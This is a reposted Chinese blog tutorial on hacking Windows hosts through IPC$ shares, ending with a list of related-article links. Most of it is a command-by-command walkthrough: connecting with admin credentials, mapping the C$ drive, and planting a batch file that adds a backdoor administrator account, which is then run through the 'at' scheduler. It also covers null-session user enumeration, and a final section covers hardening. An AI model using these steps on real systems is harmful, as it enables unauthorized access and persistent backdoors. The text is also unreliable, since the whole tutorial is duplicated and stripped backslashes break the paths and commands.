駭客零接觸(第二章 入侵之IPC$)(轉)
駭客零接觸(第二章 入侵之IPC$)(轉)[@more@]第二章 基於認證的入侵
IPC$入侵
遠端管理計算機
Telnet入侵
遠端命令執行及遠端查殺
入侵登錄檔
入侵MS SQL伺服器
獲取帳號密碼
遠端綜合入侵
第一節 IPC$入侵
一、相關知識
IPC是英文Internet Process Connection的縮寫,可以理解為“命名管道”資源,它是Win作業系統提供的一個通訊基礎,用來在兩臺主機程式之間建立通訊連線,從而進行遠端管理。而IPC後面的“$”是Win系統所使用的隱藏符號,因此“IPC$”表示IPC共享。
打個比方,IPC連線就象是挖好的地道,通訊程式就透過這個IPC地道來訪問目標主機。
預設情況下,IPC是共享的,除非人為的手工刪除IPC$。
透過IPC$連線,入侵者就能夠實現遠端控制目標主機。因此,這種基於IPC的入侵也常常被簡稱為IPC入侵。
與遠端主機建立IPC$需要以下條件:
本地機所需條件:作業系統在win 2000以下;本地計算機開放IPC$;在獲得遠端主機的管理員帳號和密碼的情況下,IPC$才可能建立成功,否則建立的IPC$空連線,是沒有任務許可權的。
遠端主機需要的條件:開放IPC$共享、執行Server服務。
可以用DOS命令來檢視Windows系統的共享:net share
一些常用的DOS命令:
net user:系統帳號類操作
net localgroup:系統組操作
net use:遠端連線、對映操作
net send:信使命令
net time:檢視遠端主機系統時間
netstat –n :檢視本機網路連線狀態
nbtstat –a IP :檢視指定IP主機的NetBIOS資訊。
At :在目標主機建立計劃任務。
二、例項:
1、進入DOS介面。CMD。
2、建立IPC$連線
net use 192.168.1.88ipc$ “密碼” /user:”使用者”
3、對映網路驅動器
net use z: 192.168.1.88c$
4、查詢指定檔案
右擊剛才對映的Z盤,選擇“搜尋”,便可以查詢需要的檔案。
5、建立後門帳號
首先編寫test.bat檔案,內容為:
net use myname 12345678 /add
net localgroup administrators myname /add
複製檔案到目標主機:
copy test.bat 192.168.1.88c$
或
copy test.bat 192.168.1.88admin$
6、透過計劃任務執行test.bat檔案。
檢視目標主機的系統時間:net time 192.168.1.88
在目標主機建立計劃任務:at 192.168.1.88 14:30 c: est.bat
7、斷開連線
net use * /del
或
net use 192.168.1.88ipc$ /del
三、IPC$空連線漏洞
IPC$本來要求客戶機有足夠的許可權才能連線到目標主機,然而事實並不盡然。IPC$空連線漏洞允許客戶端只使用空使用者各、空密碼就可以與目標主機成功建立連線。雖然空連線無法執行管理類操作,例如對映網路驅動器、上傳檔案、執行指令碼等命令,但是入侵者可以探測目標主機的一些關鍵資訊。
例項:
1、建立IPC$空連線
net use 192.168.1.88ipc$ “” /user:””
2、獲得目標主機的系統時間
net time 192.168.1.88
3、獲取目標主機上的使用者資訊。
兩款軟體:USERINFO和X-Scan
USERINFO:利用userinfo來查詢使用者資訊時,不需要先建立IPC$連線。
userinfo 192.168.1.88 administrator
X-Scan:自動掃描。
四、安全解決方案
首先,可以用net share來檢視本機共享資源。
1、利用BAT批處理檔案刪除預設共享
首先建立BAT檔案,內容如下:
net share ipc$ /del
net share adimn$ /del
net share c$ /del
net share d$ /del
然後將檔案拷至本機“開始”/“程式”/“啟動”中,然後每次開機便會自動執行此BAT檔案,從而刪除了預設共享。
如果要開啟共享,可用以下命令:net share admin$
2、利用登錄檔來刪除預設共享
Win 2000伺服器版本:
HLMSystemCurrentControlSetServiceslanmanserverParameters
新建Name:AutoShareServer
Type:DWORD (雙位元組)
Value:0
Win 2000工作站版本:
HLMSystemCurrentControlSetServiceslanmanserverParameters
新建Name:AutoShareWks
Type:DWORD (雙位元組)
Value:0
如果要使用預設共享,只需刪除剛才新建的鍵值便可。或者在登錄檔中新建一鍵值:
HLMSoftwareMicrosoftWindowsCurrentVersionpolicies
新建一network子鍵,並在其下新建一名為NoShareControl的雙位元組,其值為1。
3、關閉Server
Server服務是IPC$和預設共享所依賴的服務,如果關閉了Server服務,IPC$和預設共享便不存在,但同時也使伺服器喪失其他一些服務功能。所以,此方法不太適合伺服器使用,只適合個人計算機使用。
在計算機“管理工具”下的“服務”下將Server服務禁用。
也可在DOS下關閉Server服務,但此命令只能生效一次,重啟電腦後,Server服務依然自動開啟。 命令:net stop server /y
4、禁止空連線進行列舉攻擊的方法
有了IPC$空連線作為連線基礎,入侵者便可以反覆的試探性連線,直到連線成功、獲取密碼。
禁止空連線進行列舉攻擊可以利用登錄檔來修改:
HLMSystemCurrentControlSetControlLsa
將Restrict Anonymous=DWORD的鍵值改為:00000001
但是,這種方法並不能禁止建立空連線。現在再使用X-Sacn對計算機進行安全檢測,便會發現該主機不再洩露使用者列表和共享列表了,作業系統也不會被X-Scan識別了。
IPC$入侵
遠端管理計算機
Telnet入侵
遠端命令執行及遠端查殺
入侵登錄檔
入侵MS SQL伺服器
獲取帳號密碼
遠端綜合入侵
第一節 IPC$入侵
一、相關知識
IPC是英文Internet Process Connection的縮寫,可以理解為“命名管道”資源,它是Win作業系統提供的一個通訊基礎,用來在兩臺主機程式之間建立通訊連線,從而進行遠端管理。而IPC後面的“$”是Win系統所使用的隱藏符號,因此“IPC$”表示IPC共享。
打個比方,IPC連線就象是挖好的地道,通訊程式就透過這個IPC地道來訪問目標主機。
預設情況下,IPC是共享的,除非人為的手工刪除IPC$。
透過IPC$連線,入侵者就能夠實現遠端控制目標主機。因此,這種基於IPC的入侵也常常被簡稱為IPC入侵。
與遠端主機建立IPC$需要以下條件:
本地機所需條件:作業系統在win 2000以下;本地計算機開放IPC$;在獲得遠端主機的管理員帳號和密碼的情況下,IPC$才可能建立成功,否則建立的IPC$空連線,是沒有任務許可權的。
遠端主機需要的條件:開放IPC$共享、執行Server服務。
可以用DOS命令來檢視Windows系統的共享:net share
一些常用的DOS命令:
net user:系統帳號類操作
net localgroup:系統組操作
net use:遠端連線、對映操作
net send:信使命令
net time:檢視遠端主機系統時間
netstat –n :檢視本機網路連線狀態
nbtstat –a IP :檢視指定IP主機的NetBIOS資訊。
At :在目標主機建立計劃任務。
二、例項:
1、進入DOS介面。CMD。
2、建立IPC$連線
net use 192.168.1.88ipc$ “密碼” /user:”使用者”
3、對映網路驅動器
net use z: 192.168.1.88c$
4、查詢指定檔案
右擊剛才對映的Z盤,選擇“搜尋”,便可以查詢需要的檔案。
5、建立後門帳號
首先編寫test.bat檔案,內容為:
net use myname 12345678 /add
net localgroup administrators myname /add
複製檔案到目標主機:
copy test.bat 192.168.1.88c$
或
copy test.bat 192.168.1.88admin$
6、透過計劃任務執行test.bat檔案。
檢視目標主機的系統時間:net time 192.168.1.88
在目標主機建立計劃任務:at 192.168.1.88 14:30 c: est.bat
7、斷開連線
net use * /del
或
net use 192.168.1.88ipc$ /del
三、IPC$空連線漏洞
IPC$本來要求客戶機有足夠的許可權才能連線到目標主機,然而事實並不盡然。IPC$空連線漏洞允許客戶端只使用空使用者各、空密碼就可以與目標主機成功建立連線。雖然空連線無法執行管理類操作,例如對映網路驅動器、上傳檔案、執行指令碼等命令,但是入侵者可以探測目標主機的一些關鍵資訊。
例項:
1、建立IPC$空連線
net use 192.168.1.88ipc$ “” /user:””
2、獲得目標主機的系統時間
net time 192.168.1.88
3、獲取目標主機上的使用者資訊。
兩款軟體:USERINFO和X-Scan
USERINFO:利用userinfo來查詢使用者資訊時,不需要先建立IPC$連線。
userinfo 192.168.1.88 administrator
X-Scan:自動掃描。
四、安全解決方案
首先,可以用net share來檢視本機共享資源。
1、利用BAT批處理檔案刪除預設共享
首先建立BAT檔案,內容如下:
net share ipc$ /del
net share adimn$ /del
net share c$ /del
net share d$ /del
然後將檔案拷至本機“開始”/“程式”/“啟動”中,然後每次開機便會自動執行此BAT檔案,從而刪除了預設共享。
如果要開啟共享,可用以下命令:net share admin$
2、利用登錄檔來刪除預設共享
Win 2000伺服器版本:
HLMSystemCurrentControlSetServiceslanmanserverParameters
新建Name:AutoShareServer
Type:DWORD (雙位元組)
Value:0
Win 2000工作站版本:
HLMSystemCurrentControlSetServiceslanmanserverParameters
新建Name:AutoShareWks
Type:DWORD (雙位元組)
Value:0
如果要使用預設共享,只需刪除剛才新建的鍵值便可。或者在登錄檔中新建一鍵值:
HLMSoftwareMicrosoftWindowsCurrentVersionpolicies
新建一network子鍵,並在其下新建一名為NoShareControl的雙位元組,其值為1。
3、關閉Server
Server服務是IPC$和預設共享所依賴的服務,如果關閉了Server服務,IPC$和預設共享便不存在,但同時也使伺服器喪失其他一些服務功能。所以,此方法不太適合伺服器使用,只適合個人計算機使用。
在計算機“管理工具”下的“服務”下將Server服務禁用。
也可在DOS下關閉Server服務,但此命令只能生效一次,重啟電腦後,Server服務依然自動開啟。 命令:net stop server /y
4、禁止空連線進行列舉攻擊的方法
有了IPC$空連線作為連線基礎,入侵者便可以反覆的試探性連線,直到連線成功、獲取密碼。
禁止空連線進行列舉攻擊可以利用登錄檔來修改:
HLMSystemCurrentControlSetControlLsa
將Restrict Anonymous=DWORD的鍵值改為:00000001
但是,這種方法並不能禁止建立空連線。現在再使用X-Sacn對計算機進行安全檢測,便會發現該主機不再洩露使用者列表和共享列表了,作業系統也不會被X-Scan識別了。
來自 “ ITPUB部落格 ” ,連結:http://blog.itpub.net/10617542/viewspace-949484/,如需轉載,請註明出處,否則將追究法律責任。
相關文章
- 駭客初步接觸之網站的入侵(轉)網站
- 入侵檢測術語全接觸(轉)
- 駭客經驗之sa弱口令強行入侵(轉)
- 防黑經驗之防禦駭客入侵的方法(轉)
- 駭客經驗談系列之入侵3389起源完整編(轉)
- 駭客經驗之教你穿透ADSL路由入侵內網(轉)穿透路由內網
- 一份詳盡的IPC$入侵資料 (轉)
- 防止別人用ipc$和預設共享入侵(轉)
- IPC$概念及入侵方式研究
- 知己知彼:駭客經驗之sa弱口令強行入侵(轉)
- 作業系統全接觸之UNIX系統(轉)作業系統
- 全面接觸SQL語法(轉)SQL
- 資料庫系統防駭客入侵技術(轉)資料庫
- Vista阻駭客入侵 合法程式也遭殃(轉)
- linux 啟動全接觸(轉)Linux
- 接觸postgresqlSQL
- 托盤程式設計全接觸(轉)程式設計
- 托盤程式設計全接觸 (轉)程式設計
- 資料庫系統 防止駭客入侵之技術綜述資料庫
- MVVM初接觸MVVM
- WebSocket初接觸Web
- 初次接觸 CookieCookie
- SCSS初接觸CSS
- 零基礎剛接觸程式設計,該怎麼學?程式設計
- 動態生成select選項全接觸 (轉)
- 全接觸SQLServer異常與孤立事務! (轉)SQLServer
- 初次接觸express框架Express框架
- 一、初次接觸javaJava
- ITextSharp 初次接觸
- IPC之套接字
- 防止駭客入侵系統建立隱藏帳戶
- iris 的 websocket 初始接觸Web
- 接觸el-admin
- MyBatis TypeHandler的初次接觸MyBatis
- 再次接觸物件導向物件
- 剛接觸JAVA 問問Java
- 再次接觸tts的特性TTS
- 從solar winds駭客入侵事件中看供應鏈安全事件